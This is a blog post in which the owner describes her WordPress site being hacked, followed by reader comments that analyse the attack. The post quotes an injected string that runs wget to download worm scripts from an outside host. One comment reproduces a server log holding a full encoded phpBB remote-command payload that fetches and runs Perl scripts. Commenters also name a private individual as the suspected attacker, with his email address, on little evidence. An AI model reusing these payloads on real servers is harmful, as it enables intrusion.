Huh? Did someone hack my site? I loaded the page and got no CSS, so checked the template to find that the link to the CSS file had been replaced by this (I added line breaks, this was really all one long line):

http://huminf.uib.no/~jill/wp-login.php?
action=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;
wget%20www.visualcoders.net/spybot.txt;
wget%20www.visualcoders.net/worm1.txt;
wget%20www.visualcoders.net/php.txt;
wget%20www.visualcoders.net/ownz.txt;
wget%20www.visualcoders.net/wp-layout.css

My template was fine, so I looked at the options, and sure enough, my “site URL”, which WordPress glues into the template for almost every link it makes and which is supposed to be simply this: “http://huminf.uib.no/~jill/”, had been changed to all the following:

http://huminf.uib.no/~jill/wp-login.php?
action=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;
wget%20www.visualcoders.net/spybot.txt;
wget%20www.visualcoders.net/worm1.txt;
wget%20www.visualcoders.net/php.txt;
wget%20www.visualcoders.net/ownz.txt;
wget%20www.visualcoders.net

That looks very uncool. Now even to a total amateur at PHP like me, that seems to read as though every time someone looks at my blog, instead of the site fetching a CSS file that makes the page look pretty, an action is invoked that “gets” (“wget”, yeah?) a whole pile of nasty files called things like spy.gif and worm1.txt.

Does anyone understand this? What are they actually trying to do? Would this affect readers or my site? Would I have seen all sorts of stupid messages about how “spykids ownz your browser” if I’d been using Windows and Microsoft Explorer isntead of Firefox on a Mac? And how the heck did they change my site URL?

I fixed it, but I should obviously do something about security, huh? Except it’s Christmas! I don’t have time for this!!!
[I’ve asked for help at the WordPress support forum as well, and I filed a complain against visualcoders.net with Google, who run adwords through them. And I emailed the person who registered the domain, Mimoun Raddahi, who lives in Antwerpen, Belgium. Is there any chance visualcoders.net isn’t to blame here?]

10 thoughts on “did my blog just get hacked?

  1. L33tdawg

    The attack you speak of is actually quite well known — if you look at the contents of the text files you’ll see that they’re basically PERL scripts designed to compromise anyone who unsuspectingly clicks on the link and is vulnerable (IE users only). That being said, if you examine the ownz.txt file you’ll see that this ‘kit’ has been assembled by the rather well known group ‘Spykids’ (http://www.zone-h.org/en/defacements/filter/filter_defacer=spykids). It looks like you either have a member of Spykids trying to ‘own’ your site or a script kiddie who happens to have the spykid ‘kit’ so to speak. You might want to see if there are any vulns for your version of WordPress.

    Good luck.

    Cheers,
    LD.

  2. Elin

    Something odd is happening at my site too – my index file is being replaced now and then. It has been happening for some months – but I don’t have time to look at it. Argh.

  3. AWolf

    wget is a network utility to retrieve files from the Web using http and ftp and it runs from the command line in *nix operating systems. It is very useful for mirroring sites and if you aren’t careful, it might try to download the entire internet onto your server (a mistake I made several years ago when I was moving my websites to a new service provider). Also the “%20” is a blank space in html. My original guess was that visualcoders.net was the intended victim of your site being hacked. That is just a guess.

  4. Tom Bartling

    One of my websites also got hit, although I haven’t found any negative effects. They tried to access a page that’s looking for an ID number, but they replaced the ID with the same info that you posted.

    I did a little research.
    The hit came from IP address 213.193.231.130.
    213.193.231.130 is owned by Tom Myny at Linux Systems.
    The script pointed to visualcoders.net.
    Tracking the IP for visualcoders.net using traceroute (or tracert on Windows) finds visualcoders.net is located at 213.193.231.130.
    visualcoders.net is owned by Mimoun Raddahi.
    The original email address for Mimoun Raddahi is mimoun@pandora.be
    pandora.be is a domain that is owned by Telenet.

    I suspect that Mimoun Raddahi is the hacker. I sent an email to Tom Myny at Linux Systems (the hosting company for visualcoders.net), and I copied the Technical Contact at Telenet.

    Hopefully, this will resolve the hacking problem.

    On a side note, this happened to me on Dec. 26th. While doing research, I Googled “Mimoum Raddahi” and found this website, one day after your posting. Man, google is fast.

  5. Tom Myny

    Hi All,

    A script was running on our servers (wget%20www.visualcoders.net/spybot.txt;
    wget%20www.visualcoders.net/worm1.txt;) because one of the customers phpbb sites was hacked. (viewforum.php bug)
    I removed the buggy php file and stopped the processes.
    visualcoders.net is not hosted by us (never was …)

    perl php.txt SERVER_SIGNATURE=

    Apache/1.3.31 Server at http://www.tegenwind.be Port 80

    ? UNIQUE_ID=Qc5aCdXB54IAABRQNuQ HTTP_USER_AGENT=lwp-trivial/1.35 SERVER_PORT=80 HTTP_HOST=www.tegenwind.be SCRIPT_FILENAME=forum/viewtopic.php REQUEST_URI=/forum/viewtopic.php?t=97&highlight=%2527%252esystem(chr(99)%252echr(100)%252echr(32)%252echr(47)%252echr(116)%252echr(109)%252echr(112)%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(119)%252echr(119)%252echr(119)%252echr(46)%252echr(118)%252echr(105)%252echr(115)%252echr(117)%252echr(97)%252echr(108)%252echr(99)%252echr(111)%252echr(100)%252echr(101)%252echr(114)%252echr(115)%252echr(46)%252echr(110)%252echr(101)%252echr(116)%252echr(47)%252echr(115)%252echr(112)%252echr(121)%252echr(98)%252echr(111)%252echr(116)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(119)%252echr(119)%252echr(119)%252echr(46)%252echr(118)%252echr(105)%252echr(115)%252echr(117)%252echr(97)%252echr(108)%252echr(99)%252echr(111)%252echr(100)%252echr(101)%252echr(114)%252echr(115)%252echr(46)%252echr(110)%252echr(101)%252echr(116)%252echr(47)%252echr(119)%252echr(111)%252echr(114)%252echr(109)%252echr(49)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(119)%252echr(119)%252echr(119)%252echr(46)%252echr(118)%252echr(105)%252echr(115)%252echr(117)%252echr(97)%252echr(108)%252echr(99)%252echr(111)%252echr(100)%252echr(101)%252echr(114)%252echr(115)%252echr(46)%252echr(110)%252echr(101)%252echr(116)%252echr(47)%252echr(112)%252echr(104)%252echr(112)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(119)%252echr(119)%252echr(119)%252echr(46)%252echr(118)%252echr(105)%252echr(115)%252echr(117)%252echr(97)%252echr(108)%252echr(99)%252echr(111)%252echr(100)%252echr(101)%252echr(114)%252echr(115)%252echr(46)%252echr(110)%252echr(101)%252echr(116)%252echr(47)%252echr(111)%252echr(119)%252echr(110)%252echr(122)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(119)%252echr(119)%252echr(119)%252echr(46)%252echr(118)%252echr(105)%252echr(115)%252echr(117)%252echr(97)%252echr(108)%252echr(99)%252echr(111)%252echr(100)%252echr(101)%252echr(114)%252echr(115)%252echr(46)%252echr(110)%252echr(101)%252echr(116)%252echr(47)%252echr(122)%252echr(111)%252echr(110)%252echr(101)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(115)%252echr(112)%252echr(121)%252echr(98)%252echr(111)%252echr(116)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(119)%252echr(111)%252echr(114)%252echr(109)%252echr(49)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(111)%252echr(119)%252echr(110)%252echr(122)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(112)%252echr(104)%252echr(112)%252echr(46)%252echr(116)%252echr(120)%252echr(116))%252e%2527 SCRIPT_NAME=/forum/viewtopic.php REMOTE_HOST=sun2.netwerkshop.nl REMOTE_PORT=56449 PATH=/bin:/usr/bin PWD=/tmp SERVER_ADMIN=webmaster@linuxsystems.be REDIRECT_STATUS=200 PATH_TRANSLATED=forum/viewtopic.php REMOTE_ADDR=194.109.209.106 SHLVL=1 SERVER_NAME=www.tegenwind.be

    Best Regards,
    Tom

  6. Messenger

    HOLA

  7. Lars

    Indeed the 1st Google return for Mimoun Raddahi is this thread..!!!

    Our stats file showed a 5x leap in page views on xmas day and from looking at the log files I found pretty much the same string described above.. hitting us every couple of seconds and coming from multiple IP addys.

    Then I noticed a repetative request string using LWP:
    http://www.google.com/search?hl=en&q=LWP&btnG=Google+Search
    which looks like a data scrape script. I reported the flood
    to Go Daddy but wouldn’t ya know it; visualcoders.net is now
    hosted (already) somewhere else.

    At least we haven’t had any problems with re-write of our files
    but this kind of action def. borders on the crimminal, imho 8-(

  8. Jill

    Wow, thanks guys, for the speedy work! Google works really fast, yes…

    There’s a lot more about this kind of attack on WordPress blog in the WordPress support forums – it’s done simply by typing commands into the URL. The vulnerability is fixed in the latest version of WordPress, or you can delete a few lines from one of the files in earlier versions to protect your system. Discussions are here and here.

    Scary, huh?

  9. k

    welcome to the internet.

  10. Bryan-Mitchell Young

    Apparently, it is a new worm going around that attacks PHP sites, including wordpress.

Leave a Reply to Tom Myny Cancel reply

Recommended Posts

Machine Vision Presentations

Drones in Society conference

I’m (virtually) attending Elisa Serifinalli’s conference Drones in Society: New Visual Aesthetics today, and will be presenting work-in-progress exploring how drones are presented in the 500 novels, movies, artworks, games and other stories that we have analysed in the Database of Machine […]

Machine Vision

Cultural Representations of Machine Vision: An Experimental Mixed Methods Workshop

Call for submissions to a workshop, Bergen, Norway
Workshop dates: 15-17 August 2022
Proposals due: 15 June

The Machine Vision in Everyday Life project invites proposals for an interdisciplinary workshop using qualitative approaches and digital methods to analyse how machine vision is represented in art, science fiction, games, social media and other forms of cultural and aesthetic expression.

Digital Humanities Machine Vision

What do different machine vision technologies do in fiction and art?

For the Machine Vision in Everyday Life project we’ve analysed how machine vision technologies are portrayed and used in 500 works of fiction and art, including 77 digital games, 190 digital artworks and 233 movies, novels and other narratives. You can browse […]